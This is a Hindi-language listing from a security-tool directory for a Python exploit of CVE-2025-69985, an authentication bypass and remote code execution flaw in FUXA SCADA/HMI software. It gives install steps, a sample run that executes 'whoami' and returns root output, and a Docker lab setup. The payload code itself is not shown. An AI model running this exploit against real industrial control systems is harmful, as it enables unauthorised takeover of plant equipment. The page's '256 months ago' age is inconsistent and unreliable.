Skip to content
KitploitKITPLOIT
उपकरणब्लॉग
जमा करें
उपकरणब्लॉग
जमा करें

हैकिंग, पेनटेस्ट और साइबर सुरक्षा उपकरण आपके सुरक्षा शस्त्रागार के लिए!

Kitploit हैकिंग, साइबर सुरक्षा और पेंटेस्टिंग टूल्स की एक निर्देशिका है। कमजोरियों को खोजने, सिस्टम का विश्लेषण करने, परीक्षण को स्वचालित करने और अपनी सुरक्षा को मजबूत करने के लिए नवीनतम प्रोजेक्ट अपडेट खोजें।

··फ़ीड·संपर्क·गोपनीयता·© 2026 Kitploit

टूल निर्देशिका

श्रेणियाँ

सभी श्रेणियाँ देखें
Loading categories
उपकरण/GitHubGitHub/joshuavanderpoll/cve-2025-69985
भेद्यता विश्लेषणशोषणSCADA/ICS सुरक्षावेब एप्लिकेशन शोषणप्रमाणीकरणरिमोट एक्सेस टूल
GitHubjoshuavanderpoll/cve-2025-69985

CVE-2025-69985

# CVE-2025-69985 के लिए Python एक्सप्लॉइट जो FUXA SCADA सॉफ्टवेयर को लक्षित करता है। /api/runscript एंडपॉइंट पर निर्मित JSON पेलोड भेजकर प्रमाणीकरण को बायपास करता है और रिमोट कोड निष्पादन प्राप्त करता है।

रिपॉजिटरी देखेंवेबसाइट
256 महीने पहलेअभी तक समीक्षित नहीं

सबसे लोकप्रिय

सभी देखें →

हमारे समुदाय द्वारा सबसे अधिक उपयोग किए जाने वाले उपकरण खोजें।

सभी उपकरण खोजें

हमारे उपकरणों का संग्रह ब्राउज़ करें

सभी उपकरण देखें →
साझा करें

FUXA ≤ 1.2.8 प्रमाणीकरण बाईपास + RCE (CVE-2025-69985)

Python

📜 विवरण

यह Python एक्सप्लॉइट CVE-2025-69985 को लक्षित करता है, जो FUXA (वेब-आधारित SCADA/HMI सॉफ़्टवेयर) संस्करण ≤ 1.2.8 में एक गंभीर प्रमाणीकरण बाईपास भेद्यता है। असुरक्षित /api/runscript एंडपॉइंट पर एम्बेडेड Node.js कोड के साथ एक विशेष रूप से तैयार JSON पेलोड भेजकर, यह FUXA प्रक्रिया के रूप में रिमोट कमांड निष्पादन प्राप्त करता है — प्रतिक्रिया में पूर्ण stdout/stderr को समकालिक रूप से कैप्चर करता है।

🛠️ स्थापना

[!NOTE] परियोजना निर्भरताओं के लिए एक स्वच्छ और पृथक वातावरण सुनिश्चित करने हेतु, Python के venv मॉड्यूल का उपयोग करने की अनुशंसा की जाती है।

OSX/Linux

root@kitploit:~
git clone https://github.com/joshuavanderpoll/CVE-2025-69985.git
cd CVE-2025-69985
python3 -m venv .venv
source .venv/bin/activate
pip3 install -r requirements.txt

Windows

root@kitploit:~
git clone https://github.com/joshuavanderpoll/CVE-2025-69985.git
cd CVE-2025-69985
python -m venv .venv 
.venv\Scripts\activate
pip3 install -r requirements.txt

⚙️ उपयोग

root@kitploit:~
python3 CVE-2025-69985.py -u http://localhost:1881/ -c whoami

 Target : http://localhost:1881
 Command: whoami

[*] Preparing payload → executing: whoami
[*] Sending exploit request to /api/runscript ...
[*] Response status: 200
[+] Command executed successfully (CVE-2025-69985 bypass)!

=== COMMAND OUTPUT ===
"root\n"
======================


======================================================================
 Exploit completed!.
======================================================================

🐋 Docker PoC

root@kitploit:~
cd docker/
docker compose down
docker compose up -d
# You can test at --url http://127.0.0.1:1881/

💻 उदाहरण

PoC निष्पादित करें

📢 अस्वीकरण

यह उपकरण केवल शैक्षिक और अनुसंधान उद्देश्यों के लिए प्रदान किया गया है। निर्माता उपकरण के किसी भी दुरुपयोग या क्षति के लिए कोई जिम्मेदारी नहीं लेता है।

टूल डाउनलोड करें